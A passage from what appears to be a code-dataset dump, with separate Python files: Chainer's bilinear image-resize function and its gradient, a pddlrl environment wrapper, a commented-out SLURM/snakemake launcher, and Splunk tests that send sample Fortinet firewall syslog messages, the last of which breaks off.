        # wcol[0, 1] = uw * (1 - vw)
        # wcol[1, 0] = (1 - uw) * vw
        # wcol[1, 1] = uw * vw
        wcol[0, 1] = uw[i:i_end]
        numpy.subtract(1, wcol[0, 1], out=wcol[0, 0])
        numpy.multiply(wcol[0], vw[i:i_end], out=wcol[1])
        wcol[0] -= wcol[1]
        # packing to the panel whose shape is (B, C, 2, 2, l, out_W)
        panel = x[:, :, vcol[:, None], ucol[None, :]]
        # interpolation: weighted sum over the 4 neighbors via einsum,
        # written directly into the output slice.
        panel = panel.reshape((B * C, 4, l * out_W))
        weights = wcol.reshape((4, l * out_W))
        iout = i * out_W
        iout_end = i_end * out_W
        numpy.einsum('ijk,jk->ik', panel, weights, out=y[:, iout:iout_end])
        del panel, weights
    return y.reshape((B, C, out_H, out_W))
def interpolate_bilinear_gpu(x, v, u, vw, uw):
    """Bilinear interpolation on GPU via a single elementwise kernel.

    Same contract as :func:`interpolate_bilinear_cpu`; one kernel thread
    produces one output pixel from its four clamped source neighbors.
    """
    B, C, H, W = x.shape
    out_H, out_W = v.shape
    y = cuda.cupy.empty((B, C, out_H, out_W), dtype=x.dtype)
    cuda.elementwise(
        'raw T x, S v, S u, T vw, T uw, S H, S W, S outsize', 'T y', '''
        // indices
        S v0 = v;
        S v1 = min(v + 1, (S)(H - 1));
        S u0 = u;
        S u1 = min(u + 1, (S)(W - 1));
        // weights
        T w0 = (1 - vw) * (1 - uw);
        T w1 = (1 - vw) * uw;
        T w2 = vw * (1 - uw);
        T w3 = vw * uw;
        // fetch
        S offset = i / outsize * H * W;
        T px0 = x[offset + v0 * W + u0];
        T px1 = x[offset + v0 * W + u1];
        T px2 = x[offset + v1 * W + u0];
        T px3 = x[offset + v1 * W + u1];
        // interpolate
        y = (w0 * px0 + w1 * px1) + (w2 * px2 + w3 * px3);
        ''', 'resize_images_interpolate_bilinear'
    )(x, v, u, vw, uw, H, W, out_H * out_W, y)
    return y
def interpolate_grad_bilinear_cpu(gy, v, u, vw, uw, H, W):
    """Backward pass of bilinear interpolation on CPU.

    Scatters each output gradient back onto its four source pixels,
    weighted by the same bilinear weights as the forward pass.

    Args:
        gy: output gradients, shape (B, C, out_H, out_W).
        v, u: integer source indices, shape (out_H, out_W).
        vw, uw: fractional weights, shape (out_H, out_W).
        H, W: input image size.

    Returns:
        Input gradients of shape (B, C, H, W).
    """
    B, C, out_H, out_W = gy.shape
    # indices: top-left neighbor and its border-clamped +1 neighbor.
    vcol = numpy.empty((2, out_H, out_W), dtype=v.dtype)
    ucol = numpy.empty((2, out_H, out_W), dtype=u.dtype)
    vcol[0] = v
    ucol[0] = u
    numpy.add(vcol[0], 1, out=vcol[1])
    numpy.add(ucol[0], 1, out=ucol[1])
    numpy.minimum(vcol[1], H - 1, out=vcol[1])
    numpy.minimum(ucol[1], W - 1, out=ucol[1])
    # weights (same construction as the forward CPU path).
    wcol = numpy.empty((2, 2, out_H, out_W), dtype=gy.dtype)
    wcol[0, 1] = uw
    numpy.subtract(1, wcol[0, 1], out=wcol[0, 0])
    numpy.multiply(wcol[0], vw, out=wcol[1])
    wcol[0] -= wcol[1]
    # grad: per-neighbor weighted gradients, shape (B*C, 2, 2, out_H, out_W).
    gycol = gy.reshape((B * C, 1, 1, out_H, out_W)) * wcol
    # ravel everything and use `bincount`
    # Flat destination index per contribution; bincount sums duplicates,
    # which implements the scatter-add.
    indices = (vcol[:, None] * W + ucol[None, :]).ravel()
    offsets = numpy.arange(0, B * C * H * W, H * W, dtype=v.dtype)
    indices = (offsets[:, None] + indices).ravel()
    gx = numpy.bincount(indices, weights=gycol.ravel(),
                        minlength=(B * C * H * W))
    # bincount returns float64; cast back to the gradient dtype.
    gx = gx.astype(gy.dtype, copy=False)
    return gx.reshape((B, C, H, W))
def interpolate_grad_bilinear_gpu(gy, v, u, vw, uw, H, W):
    """Backward pass of bilinear interpolation on GPU.

    One kernel thread per output gradient; contributions are scattered to
    the four source pixels with atomicAdd since neighbors overlap.
    """
    B, C, out_H, out_W = gy.shape
    gx = cuda.cupy.zeros((B * C, H, W), dtype=gy.dtype)
    cuda.elementwise(
        'T gy, S v, S u, T vw, T uw, S H, S W, S outsize', 'raw T gx', '''
        // indices
        S v0 = v;
        S v1 = min(v + 1, (S)(H - 1));
        S u0 = u;
        S u1 = min(u + 1, (S)(W - 1));
        // weights
        T w0 = (1 - vw) * (1 - uw);
        T w1 = (1 - vw) * uw;
        T w2 = vw * (1 - uw);
        T w3 = vw * uw;
        // scatter
        S offset = i / outsize * H * W;
        atomicAdd(&gx[offset + v0 * W + u0], w0 * gy);
        atomicAdd(&gx[offset + v0 * W + u1], w1 * gy);
        atomicAdd(&gx[offset + v1 * W + u0], w2 * gy);
        atomicAdd(&gx[offset + v1 * W + u1], w3 * gy);
        ''', 'resize_images_interpolate_grad_bilinear'
    )(gy, v, u, vw, uw, H, W, out_H * out_W, gx)
    return gx.reshape((B, C, H, W))
class ResizeImages(function_node.FunctionNode):
    """Bilinear resize of NCHW image batches (forward function node).

    Stores the target (out_H, out_W); ``forward`` computes sampling indices
    and weights and dispatches to the CPU or GPU interpolation kernel;
    ``backward`` delegates to :class:`ResizeImagesGrad`.
    """

    def __init__(self, output_shape):
        self.out_H = output_shape[0]
        self.out_W = output_shape[1]

    def check_type_forward(self, in_types):
        # Exactly one float32 input of rank 4 (B, C, H, W).
        type_check._argname(in_types, ('x',))
        x_type = in_types[0]
        type_check.expect(
            x_type.dtype == numpy.float32,
            x_type.ndim == 4
        )

    def forward(self, inputs):
        x, = inputs
        xp = backend.get_array_module(x)
        _, C, H, W = x.shape
        out_H, out_W = self.out_H, self.out_W
        # Compute indices and weights.
        # ``numpy.float`` (an alias of the builtin float, i.e. float64) was
        # deprecated in NumPy 1.20 and removed in 1.24; use float64 directly.
        v = xp.linspace(0, H - 1, num=out_H, dtype=numpy.float64)
        u = xp.linspace(0, W - 1, num=out_W, dtype=numpy.float64)
        # Split each sampling coordinate into an integer cell index (v, u)
        # and a fractional weight (vw, uw).
        vw, v = xp.modf(v)
        uw, u = xp.modf(u)
        v = v.astype(numpy.intp)
        u = u.astype(numpy.intp)
        vw = vw.astype(x.dtype)
        uw = uw.astype(x.dtype)
        # Meshgrid-like operation. Meshgrid can cause
        # performance loss due to memory consumption.
        # Note that numpy 1.9 doesn't support broadcast_to method.
        v, u, vw, uw = xp.broadcast_arrays(
            v[:, None], u[None, :], vw[:, None], uw[None, :])
        if xp is numpy:
            y = interpolate_bilinear_cpu(x, v, u, vw, uw)
        else:
            y = interpolate_bilinear_gpu(x, v, u, vw, uw)
        return y,

    def backward(self, indexes, grad_outputs):
        return ResizeImagesGrad(
            self.inputs[0].shape, (self.out_H, self.out_W)).apply(grad_outputs)
class ResizeImagesGrad(function_node.FunctionNode):
    """Gradient of :class:`ResizeImages`.

    Recomputes the same sampling indices/weights as the forward pass and
    scatter-adds the output gradients back onto the input image grid;
    its own ``backward`` is again a forward resize (the op is linear).
    """

    def __init__(self, input_shape, output_shape):
        self.out_H = output_shape[0]
        self.out_W = output_shape[1]
        self.input_shape = input_shape

    def check_type_forward(self, in_types):
        # Exactly one float32 gradient of rank 4 (B, C, out_H, out_W).
        type_check._argname(in_types, ('gy',))
        gy_type = in_types[0]
        type_check.expect(
            gy_type.dtype == numpy.float32,
            gy_type.ndim == 4
        )

    def forward(self, inputs):
        gy, = inputs
        xp = backend.get_array_module(gy)
        _, C, H, W = self.input_shape
        out_H, out_W = self.out_H, self.out_W
        # Compute indices and weights.
        # ``numpy.float`` (an alias of the builtin float, i.e. float64) was
        # deprecated in NumPy 1.20 and removed in 1.24; use float64 directly.
        v = xp.linspace(0, H - 1, num=out_H, dtype=numpy.float64)
        u = xp.linspace(0, W - 1, num=out_W, dtype=numpy.float64)
        # Same index/weight decomposition as ResizeImages.forward.
        vw, v = xp.modf(v)
        uw, u = xp.modf(u)
        v = v.astype(numpy.intp)
        u = u.astype(numpy.intp)
        vw = vw.astype(gy.dtype)
        uw = uw.astype(gy.dtype)
        # Meshgrid-like operation. Meshgrid can cause
        # performance loss due to memory consumption.
        # Note that numpy 1.9 doesn't support broadcast_to method.
        v, u, vw, uw = xp.broadcast_arrays(
            v[:, None], u[None, :], vw[:, None], uw[None, :])
        if xp is numpy:
            gx = interpolate_grad_bilinear_cpu(gy, v, u, vw, uw, H, W)
        else:
            gx = interpolate_grad_bilinear_gpu(gy, v, u, vw, uw, H, W)
        return gx,

    def backward(self, indexes, grad_outputs):
        return ResizeImages((self.out_H, self.out_W)).apply(grad_outputs)
def resize_images(x, output_shape):
    """Resize a batch of images to ``output_shape`` with bilinear sampling.

    Currently bilinear interpolation is the only supported sampling method.

    Notation: :math:`n` is the batch size, :math:`c_I` the number of input
    channels, :math:`h`/:math:`w` the input height/width and
    :math:`h_O`/:math:`w_O` the output height/width.

    Args:
        x (:class:`~chainer.Variable` or :ref:`ndarray`):
            Input variable of shape :math:`(n, c_I, h, w)`.
        output_shape (tuple): ``(h_O, w_O)``.  Note that the order is
            (height, width), the opposite of OpenCV's convention.

    Returns:
        ~chainer.Variable: Resized image of shape
        :math:`(n, c_I, h_O, w_O)`.
    """
    resized, = ResizeImages(output_shape).apply((x,))
    return resized
| 31.879195 | 79 | 0.542316 |
795bafe32cae3f6857cf4c37a329a860c727431e | 760 | py | Python | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | 5 | 2022-03-24T16:47:21.000Z | 2022-03-25T16:04:04.000Z | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | null | null | null | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | null | null | null | # This file is a part of PDDLRL project.
# Copyright (c) 2020 Clement Gehring (clement@gehring.io)
# Copyright (c) 2021 Masataro Asai (guicho2.71828@gmail.com, masataro.asai@ibm.com), IBM Corporation
from typing import Callable
from acme.wrappers import base
import dm_env
class PreprocessWrapper(base.EnvironmentWrapper):
    """Environment wrapper that pipes every emitted TimeStep through a callable."""

    # Transformation applied to each TimeStep from the wrapped environment.
    preprocess_fn: Callable[[dm_env.TimeStep], dm_env.TimeStep]

    def __init__(self, environment, preprocess_fn):
        # Store the hook before handing the environment to the base wrapper.
        self.preprocess_fn = preprocess_fn
        super().__init__(environment)

    def reset(self):
        return self.preprocess_fn(self._environment.reset())

    def step(self, action):
        return self.preprocess_fn(self._environment.step(action))
| 29.230769 | 100 | 0.728947 |
795bb03c61f00c2afaef15536993e97a18bf2ef4 | 3,360 | py | Python | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | 1 | 2021-09-27T23:44:40.000Z | 2021-09-27T23:44:40.000Z | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | 10 | 2021-09-17T01:08:05.000Z | 2021-10-21T01:46:39.000Z | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
# import itertools as it
# import subprocess
# import sys
# from pathlib import Path
# import attr
# from colorama import Fore, Style
# from kslurm.args.arg_types import PositionalArg
# from kslurm.exceptions import ValidationError
# from kslurm.models import SlurmModel
# from kslurm.slurm import SlurmCommand
# # Helper function for formatting the list of settings in our output
# def setting_list(name: str, setting: str) -> str:
# return (
# Fore.YELLOW
# + name
# + ": "
# + Fore.WHITE
# + Style.BRIGHT
# + setting
# + Style.RESET_ALL
# )
# def profile_validator(profile: str) -> str:
# profile_path = Path.home() / ".config" / "snakemake"
# configfiles = [profile_path.glob(f"*/config.{ext}") for ext in ["yml", "yaml"]]
# profiles = [configfile.parent.name for configfile in it.chain(*configfiles)]
# if profile in profiles:
# return profile
# if profiles:
# profiles = "\n".join(profiles)
# profilelist = f"Found the following profiles:\n{profiles}"
# else:
# profilelist = f"Did not find any valid profiles in {profile_path}"
# raise ValidationError(
# f'{Fore.RED}"{Fore.LIGHTRED_EX + profile + Fore.RED}" '
# f"is not a valid profile.{Fore.RESET} \n\n{profilelist}"
# )
# # Extended Model
# @attr.s(auto_attribs=True)
# class SSnakeModel(SlurmModel):
# profile: PositionalArg[str] = PositionalArg(validator=profile_validator)
# def main():
# models = SSnakeModel()
# models.cpu.value = "2"
# models.profile
# slurm = SlurmCommand(sys.argv[1:], models)
# # Get the profile
# profile = slurm.args.profile.value
# # Use parent directory name as the job name
# slurm.name = Path.cwd().name
# slurm.output = "snakemake-%j.out"
# # Update our submission script
# slurm.script = [
# "source $SNAKEMAKE_VENV_DIR/activate",
# "panoptes --ip $(hostname -f) 1> panoptes.out 2>&1 &",
# "PANOPTES_PID=$!",
# '(tail -F panoptes.out & ) | grep -q "Running on"',
# "hostname -f",
# 'snakemake --wms-monitor "http://$(hostname -f):5000" '
# f"--profile {profile} {slurm.command}",
# "kill $PANOPTES_PID",
# "rm panoptes.out",
# ]
# # Run the process and collect the jobid output.
# output = subprocess.run(
# slurm.batch, shell=True, capture_output=True
# ).stdout.decode()
# if slurm.test:
# # output will be the issued command, so we print it
# print(Fore.WHITE + output)
# else:
# # We subtract the last 2 characters of the output
# # to remove the final "\n" characters and get the
# # job_id
# slurmid = output[:-2]
# # Print a helpful confirmation message
# print(
# f"""
# {Fore.GREEN}Scheduling Snakemake
# {Fore.LIGHTBLUE_EX}SETTINGS
# {Fore.WHITE}{slurm.slurm_args}
# {setting_list("profile", profile)}
# {setting_list("job_name", slurm.name)}
# {setting_list("job_id", slurmid)}
# {setting_list("other_args", slurm.command)}
# To cancel the job, run:
# scancel {slurmid}
# """
# )
# if __name__ == "__main__":
# main()
| 29.734513 | 85 | 0.596131 |
795bb07372febc7b18fb41970b6f61137725a836 | 80 | py | Python | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | from .parse_path import parse_path
from .import_resource import import_resource
| 26.666667 | 44 | 0.875 |
795bb07d4422db925f4ccb2386c5e1a195e5dd45 | 1,711 | py | Python | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | null | null | null | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | 2 | 2021-04-21T14:57:31.000Z | 2021-04-21T14:57:32.000Z | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | null | null | null | import re
import pytest
import requests_mock
from nfe_reader.ba.crawler import Crawler
from nfe_reader.exceptions import InvalidQRCode, UnavailableServerException
from tests.util import load_file
FAKE_URL = "http://nfe.sefaz.ba.gov.br/servicos/nfce/qrcode.aspx?p=29190710230480000300650020046429391067584521|2|1|1|02DEF8AF9895079E1B6C439CD83A91A04E0F04E0"
def test_ba_crawler(html_first_page, html_nfe, html_emitter, html_products):
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html_first_page)
m.register_uri("POST", re.compile("NFCEC_consulta_danfe.aspx"), text=html_nfe)
m.register_uri(
"POST",
re.compile("NFCEC_consulta_abas.aspx"),
[{"text": html_emitter}, {"text": html_products}],
)
crawler = Crawler()
result = crawler.search_by_qrcode(FAKE_URL)
assert result
def test_server_failed(html_server_error):
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html_server_error)
crawler = Crawler()
with pytest.raises(UnavailableServerException):
crawler.search_by_qrcode(FAKE_URL)
@pytest.mark.parametrize(
"fixture,exception_class",
[
("crawler_ba/server-error.html", UnavailableServerException),
("crawler_ba/qrcode-error.html", InvalidQRCode),
],
)
def test_server_errors(fixture, exception_class):
html = load_file(fixture)
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html)
crawler = Crawler()
with pytest.raises(exception_class):
crawler.search_by_qrcode(FAKE_URL)
| 33.54902 | 159 | 0.703098 |
795bb0c5076a1977a9004f4f381d1a399497b37c | 721 | py | Python | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 13 | 2015-05-18T14:39:00.000Z | 2020-07-22T12:57:07.000Z | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 33 | 2015-04-13T20:48:02.000Z | 2019-12-19T07:27:30.000Z | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 9 | 2016-03-31T06:56:01.000Z | 2020-01-30T16:35:45.000Z | ## relaunches cosi command until a selection trajectory is created successully (i.e., resampling selection coefficients/sweep start times from specified distributions)
## last updated: 08.15.16 vitti@broadinstitute.org NIX 3.12
import sys
import subprocess
output, cosibuild, params, maxAttempts = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
commandstring = "env COSI_NEWSIM=1 COSI_MAXATTEMPTS=" + str(maxAttempts) + " COSI_SAVE_TRAJ=" + output + " " + cosibuild + " -p " + params
itWorked = False
nAttempts = 0
while itWorked == False:
nAttempts +=1
try:
subprocess.check_output(commandstring.split())
except:
continue
itWorked = True
print("found a trajectory in " + str(nAttempts) + " attempts.") | 36.05 | 167 | 0.736477 |
795bb2483680237df7b816a6450386669ceeaf02 | 1,512 | py | Python | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.3 on 2021-10-22 13:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=50)),
],
options={
'verbose_name': 'categoria',
'verbose_name_plural': 'categorias',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(max_length=50)),
('contenido', models.CharField(max_length=50)),
('imagen', models.ImageField(blank=True, null=True, upload_to='blog')),
('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('categorias', models.ManyToManyField(to='blog.Categoria')),
],
options={
'verbose_name': 'post',
'verbose_name_plural': 'posts',
},
),
]
| 34.363636 | 119 | 0.56746 |
795bb2d1e903f35a3e8882fb8a717e9022c69ea8 | 11,535 | py | Python | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | # Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
# env = Environment(extensions=['jinja2_time.TimeExtension'])
env = Environment()
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_event(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
# "{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT60D4614044725 logid=0100040704 type=event subtype=system level=notice tz=\"{{ tzoffset }}\" vd=root logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=2 mem=35 totalsession=61 disk=2 bandwidth=158/138 setuprate=2 disklograte=0 fazlograte=0 msg=\"Performance statistics: average CPU: 2, memory: 35, concurrent sessions: 61, setup-rate: 2\"\n")
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT60D4614044725 logid=0100040704 type=event subtype=system level=notice vd=root logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=2 mem=35 totalsession=61 disk=2 bandwidth=158/138 setuprate=2 disklograte=0 fazlograte=0 msg=\"Performance statistics: average CPU: 2, memory: 35, concurrent sessions: 61, setup-rate: 2\"\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netops host=\"{{ host }}\" sourcetype=\"fgt_event\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_traffic(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:21:40 logver=52 devname=US-Corp_Main1 devid=FGT37D4613800138 logid=0317013312 type=utm subtype=webfilter eventtype=ftgd_allow level=notice vd=root sessionid=1490845588 user="" srcip=172.30.16.119 srcport=53235 srcintf="Internal" dstip=114.112.67.75 dstport=80 dstintf="External-SDC" proto=6 service=HTTP hostname="popo.wan.ijinshan.com" profile="scan" action=passthrough reqtype=direct url="/popo/launch?c=cHA9d29vZHMxOTgyQGhvdG1haWwuY29tJnV1aWQ9NDBiNDkyZDRmNzdhNjFmOTNlMjQwMjhiYjE3ZGRlYTYmY29tcGl" sentbyte=525 rcvdbyte=325 direction=outgoing msg="URL belongs to an allowed category in policy" method=domain cat=52 catdesc="Information Technology"
def test_fortinet_fgt_utm(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT37D4613800138 logid=0317013312 type=utm subtype=webfilter eventtype=ftgd_allow level=notice vd=root sessionid=1490845588 user=\"\" srcip=172.30.16.119 srcport=53235 srcintf=\"Internal\" dstip=114.112.67.75 dstport=80 dstintf=\"External-SDC\" proto=6 service=HTTP hostname=\"popo.wan.ijinshan.com\" profile=\"scan\" action=passthrough reqtype=direct url=\"/popo/launch?c=cHA9d29vZHMxOTgyQGhvdG1haWwuY29tJnV1aWQ9NDBiNDkyZDRmNzdhNjFmOTNlMjQwMjhiYjE3ZGRlYTYmY29tcGl\" sentbyte=525 rcvdbyte=325 direction=outgoing msg=\"URL belongs to an allowed category in policy\" method=domain cat=52 catdesc=\"Information Technology\"\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_utm\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_traffic_framed(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
message_len = len(message)
ietf = f"{message_len} {message}"
sendsingle(ietf, setup_sc4s[0], setup_sc4s[1][601])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
def test_fortinet_fgt_traffic_nohdr(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
